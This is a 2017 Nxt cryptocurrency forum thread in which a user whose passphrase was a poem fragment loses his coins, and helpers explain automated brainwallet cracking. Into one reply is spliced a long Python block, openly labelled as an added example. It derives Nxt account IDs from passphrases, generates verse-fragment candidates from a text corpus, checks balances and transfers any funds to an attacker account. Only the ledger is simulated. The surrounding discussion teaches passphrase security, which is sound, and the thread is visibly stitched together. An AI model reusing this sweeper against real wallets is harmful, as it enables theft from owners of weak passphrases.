Nxt Forum


Author Topic: am i hacked ?  (Read 645 times)

mael

am i hacked ?
September 26, 2017, 11:13:25 am

hi
I have had NXT in the official wallet for a long time, but I don't use it (this is an old computer).
Yesterday I took a look at my wallet with nxtportal, and I saw transactions and a transfer; I've lost my NXT, Ardor and some assets.
The transaction was made August 20; my NXT are now at another address.

My password is very, very long. Is it a hack?
(Can I give my address here so you can see?)

thanks for your help.

cayenne

Re: am i hacked ?
September 26, 2017, 11:32:02 am

Post your NXT account number (not your password).
How did you choose the password? Length is not secure unless it is also random.

mael

Re: am i hacked ?
September 26, 2017, 02:15:09 pm

NXT-F34B-VQUT-NZ9U-4STEN

My password is a poetry piece; I copy-paste it. It seems I don't have a keylogger.

starik69

Re: am i hacked ?
September 26, 2017, 06:56:11 pm

My password is a poetry piece
Big mistake  :( It can be easily cracked :'(
NXT-R2U6-22MC-LQL2-22222 (648774468) - NXT | All versions of NXT client and more - https://mega.co.nz/#F!J1xmgAyC!cnaqdxHALLMGiS0hTPrhAg

mael

Re: am i hacked ?
September 26, 2017, 07:03:43 pm

Some verses, with uppercase and special characters... are you sure?

mael

Re: am i hacked ?
September 26, 2017, 07:53:25 pm

Another thing: the address that got my NXT (NXT-XVBJ-B8VA-Q7MB-HGZXQ) received a lot of transactions the same day, same hour. What is this?

VanBreuk

Re: am i hacked ?
September 26, 2017, 08:25:00 pm

Another thing: the address that got my NXT (NXT-XVBJ-B8VA-Q7MB-HGZXQ) received a lot of transactions the same day, same hour. What is this?

This appears to be someone running a script that parses lots of insecure / low-entropy passphrases to find Nxt addresses with any balance in them, and when a balance is found, automatically transfers it to the hacker's account.

As implied above, any low-entropy passphrase (too short, composed with little variety of characters, or just not really random) can be easily cracked. Passphrases made from lines of a song, a poem, or a novel also have a good chance of being cracked. This has happened a few times since Nxt started.

As a general rule, if you can easily remember a passphrase, it is not secure enough. The same goes if it can easily be found online, as happens with songs or poems. The passphrase IS the account, and skilled hackers will sooner or later steal balances sitting in accounts with insecure passphrases.

I'm sorry about what happened, but besides taking the hard lesson and following from now on the recommended security practices for cryptocurrency software (like using the kind of randomly generated passphrase produced by the Nxt Client), all you can do is keep the hacker's Nxt address monitored, in case he eventually transfers the NXT to some exchange or service that could help you track him down.
GPG Fingerprint: B020 D1C1 F289 3B2C 3577  9EAD 455D D175 5913 C7F1

mael

Re: am i hacked ?
September 27, 2017, 07:38:18 pm

I don't understand; all the wallets were hacked at the same time, on the same day? Strange!

How can the hacker manage to find part of a poem (not in English), with more than 180 characters? Did he try all the poems?
Can't we see the guy trying to log in thousands of times?

VanBreuk

Re: am i hacked ?
September 27, 2017, 10:00:29 pm

I don't understand; all the wallets were hacked at the same time, on the same day? Strange!

How can the hacker manage to find part of a poem (not in English), with more than 180 characters? Did he try all the poems?
Can't we see the guy trying to log in thousands of times?

This is not someone aiming for a specific account and trying to find the passphrase for that account precisely. If that were so, the attacker would rather spend all his resources on cracking an account with millions of NXT in it (and fail).

See the incoming transactions in the hacker's account. We don't know for sure whether all the transactions correspond to cracked accounts, but most are pretty small amounts. These seem to come from accounts with insecure passphrases and some NXT in them that were found by the attacker at random, running a script that perhaps checks thousands of possible passphrases every second.

Cryptocurrency platforms do not have a central security point where passwords are stored somehow encrypted and you have an access log. In the case of Nxt, among others, anything you enter as a passphrase in the client will unlock an account. Try it. If you use the passphrase "dog", for instance, you will access account NXT-DMXF-2AJR-BB5L-EQZ2L, after the client warns you about an obviously insecure passphrase. If you try a different word or string (even " dog", with a space as the first character) you will get a different account number. In the client back end, the passphrase is run through a series of algorithms that return, in a deterministic way (meaning an exact passphrase string will always give the same result), a Nxt account number.

So there's always someone who will try to see if there's any NXT that can be stolen within a range of weak passphrases. If you send a few NXT to the "dog" account above, they won't last very long. When the hacker's script processes every possible passphrase within a range, it does so by checking the NXT balance of the corresponding account, and when the balance is bigger than a certain amount (it has to be bigger than 1 NXT at least, because you already need 1 NXT as the fee to transfer any coins) it runs a NXT transfer to the account where the loot goes.

Now you ask, how did he manage to find a part of a certain poem? That depends on exactly what the hacker is searching for. Checking the contents of all the accounts unlocked by passphrases made of just eight- or nine-digit integers, or of a couple of dictionary words, is not very interesting because it's very easy. That means any NXT sitting in such accounts has most likely already been grabbed, and such accounts are checked very often. But hackers can use dictionaries with collections of words or strings. They can use a small library as a dictionary, say the complete works of Pablo Neruda, and then try all the verse groupings of, for example, between 8 and 32 words. Or all the possible verse pairs. Even if intuitively that seems difficult, from the perspective of a modern powerful CPU it is not, and it would not take a long time.

In discussions about security topics, and especially password security, it has been advised to avoid passphrases that are a fragment of a book, novel, song, movie script... particularly if they can be found online. Simply because they can easily be included in the dictionary a hacker uses to go fishing. And the processing time needed to try all the combinations in such dictionaries is much lower than you think. So yes, he tried all the poems within a certain library. The only other possible explanation is that you yourself were hacked and your passphrase was stolen or captured from your keyboard, but you said that did not happen.

And finally, can we see someone "logging in" thousands or millions of times? No, because there's no central system recording all the access attempts. This is run from a machine using its own copy of the blockchain, running a lot of queries against it. You could do the same with the same code, using your Nxt client.

Security in cryptocurrency is different from what most people are used to. It's a pity that many people found this out the hard way, but once you accept the hit, the best thing you can do is learn and understand so it will never happen to you again.

mael

Re: am i hacked ?
September 28, 2017, 10:29:06 am

Thanks for your great explanation.
I still don't understand the same time for all the transactions!

martismartis

Re: am i hacked ?
September 28, 2017, 10:51:41 am

Thanks for your great explanation.
I still don't understand the same time for all the transactions!

This is possible with a script using the Nxt API.

VanBreuk

Re: am i hacked ?
September 28, 2017, 11:41:04 am

Thanks for your great explanation.
I still don't understand the same time for all the transactions!

As martis said, the hacker is running a script that automatically checks many possible passphrases within a range of values. 1) Check a passphrase; 2) Is there any NXT in that account? 3) Yes? Transfer the NXT to my account. No? Try the next passphrase.

As the process is repeated thousands of times per second, over a span of time like a day or two a bunch of accounts with insecure passphrases are automatically, progressively cracked.
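The loop just described (check a passphrase, read the account's balance, transfer anything above the fee, move to the next candidate) and the "verse groupings from a library" dictionary from the earlier reply, written out as an added example. This is not code from the thread or from the Nxt project. It assumes the client's derivation is SHA-256(passphrase) used as a clamped Curve25519 scalar, the X25519 public key of that scalar, and the first eight bytes of SHA-256(public key) read little-endian as the numeric account ID; the Reed-Solomon "NXT-XXXX-..." address form is left out, so accounts appear as numbers. The blockchain query is replaced by an in-memory balance table, the attacker's sink account and the poem are constructed, and the X25519 implementation checks itself against the RFC 7748 test vector.

```python
import hashlib
import secrets

P = 2**255 - 19          # Curve25519 field prime
A24 = 121665
BASEPOINT = 9
FEE_NQT = 100_000_000    # 1 NXT in NQT (10^8 NQT per NXT): the transfer fee the thread mentions

def _clamp(seed: bytes) -> int:
    """Turn a 32-byte seed into a Curve25519 scalar (RFC 7748 decodeScalar25519)."""
    k = bytearray(seed)
    k[0] &= 248
    k[31] &= 127
    k[31] |= 64
    return int.from_bytes(k, "little")

def x25519(k: int, u: int) -> int:
    """Montgomery ladder from RFC 7748 section 5. Not constant-time: demo only."""
    x1, x2, z2, x3, z3, swap = u, 1, 0, u, 1, 0
    for t in range(254, -1, -1):
        kt = (k >> t) & 1
        swap ^= kt
        if swap:
            x2, x3, z2, z3 = x3, x2, z3, z2
        swap = kt
        a, b = (x2 + z2) % P, (x2 - z2) % P
        aa, bb = a * a % P, b * b % P
        e = (aa - bb) % P
        c, d = (x3 + z3) % P, (x3 - z3) % P
        da, cb = d * a % P, c * b % P
        x3 = (da + cb) * (da + cb) % P
        z3 = x1 * ((da - cb) * (da - cb) % P) % P
        x2 = aa * bb % P
        z2 = e * (aa + A24 * e) % P
    if swap:
        x2, x3, z2, z3 = x3, x2, z3, z2
    return x2 * pow(z2, P - 2, P) % P

def x25519_known_answer() -> bool:
    """Self-check against the RFC 7748 section 6.1 vector (Alice's key pair)."""
    a = bytes.fromhex("77076d0a7318a57d3c16c17251b26645df4c2f87ebc0992ab177fba51db92c2a")
    pub = x25519(_clamp(a), BASEPOINT).to_bytes(32, "little").hex()
    return pub == "8520f0098930a754748b7ddcb43ef75a0dbf3a0d26381af4eba4a98eaa9b4e6a"

def account_id(passphrase: str) -> int:
    """Passphrase -> numeric account ID under the assumed derivation (see lead-in).
    Deterministic: the same string always unlocks the same account, " dog" != "dog"."""
    seed = hashlib.sha256(passphrase.encode("utf-8")).digest()
    pub = x25519(_clamp(seed), BASEPOINT).to_bytes(32, "little")
    return int.from_bytes(hashlib.sha256(pub).digest()[:8], "little")

def verse_candidates(corpus: str, min_words: int, max_words: int):
    """Every contiguous run of min_words..max_words words, capitals and punctuation kept:
    the dictionary a script builds from an author's collected works."""
    words = corpus.split()
    for n in range(min_words, max_words + 1):
        for i in range(len(words) - n + 1):
            yield " ".join(words[i:i + n])

def sweep(corpus: str, balances: dict, loot: int, min_words: int = 6, max_words: int = 14):
    """Derive each candidate's account, read its balance from the attacker's own
    copy of the ledger (here a dict), and move anything above the fee to `loot`."""
    stolen = []
    for phrase in verse_candidates(corpus, min_words, max_words):
        acct = account_id(phrase)
        bal = balances.get(acct, 0)
        if bal > FEE_NQT:                        # must at least cover the 1 NXT fee
            amount = bal - FEE_NQT
            balances[acct] = 0
            balances[loot] = balances.get(loot, 0) + amount
            stolen.append((phrase, acct, amount))
    return stolen

# Constructed stand-in for a published poem the attacker has indexed.
CORPUS = """
Under the grey roof the river keeps its counsel,
And every lamp along the quay burns twice:
Once for the sailor, once for the one who waits;
The tide forgets, the stones do not.
"""
# The victim's "long, with capitals and punctuation" passphrase: 12 words of the corpus.
VICTIM_PHRASE = "And every lamp along the quay burns twice: Once for the sailor,"
# A passphrase of the kind the client generates for you: random, found in no corpus.
RANDOM_PHRASE = secrets.token_urlsafe(32)

def run_demo():
    """One sweep over the constructed corpus; returns (stolen, balances)."""
    attacker = account_id("attacker sink account")   # constructed loot address
    balances = {
        account_id(VICTIM_PHRASE): 500 * 10**8,      # 500 NXT behind a verse fragment
        account_id(RANDOM_PHRASE): 10_000 * 10**8,   # 10,000 NXT behind a random phrase
    }
    stolen = sweep(CORPUS, balances, attacker)
    return stolen, balances

if __name__ == "__main__":
    for phrase, acct, amount in run_demo()[0]:
        print(f"cracked account {acct} with {phrase!r}: took {amount / 10**8} NXT")
```

Two things worth noticing when running it: the victim's fragment is recovered with its capitals and punctuation intact, because the candidate is cut from the same text the victim copied from, so those characters add no entropy; and the whole sweep touches no server, every step being a hash, a scalar multiplication and a dictionary lookup against a local ledger, which is why there is no login log anyone could inspect. Only the random passphrase's balance survives the sweep.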

mael

Re: am i hacked ?
September 29, 2017, 11:10:01 am

So, it's finished for me with NXT and Ardor. 4 years in the same boat...
It was too easy for NXT-XVBJ-B8VA-Q7MB-HGZXQ to steal my money, like that of too many others.

Bye

VanBreuk

Re: am i hacked ?
September 29, 2017, 12:30:58 pm

So, it's finished for me with NXT and Ardor. 4 years in the same boat...
It was too easy for NXT-XVBJ-B8VA-Q7MB-HGZXQ to steal my money, like that of too many others.

Bye

We're sorry to see you leave and that you lost your coins. Good luck.

But as a closing note, this only happened to users who overlooked one or more important security recommendations. It is a cautionary tale about how important it is to follow good security practices. Use the passphrases generated by the Nxt Client, and if you want to use a passphrase you generated yourself, make sure you know what you're doing and that your passphrase is truly random and secure enough. If you use a secure passphrase, and you keep it securely stored, your coins will be safe, in Nxt and in any other cryptocurrency platform.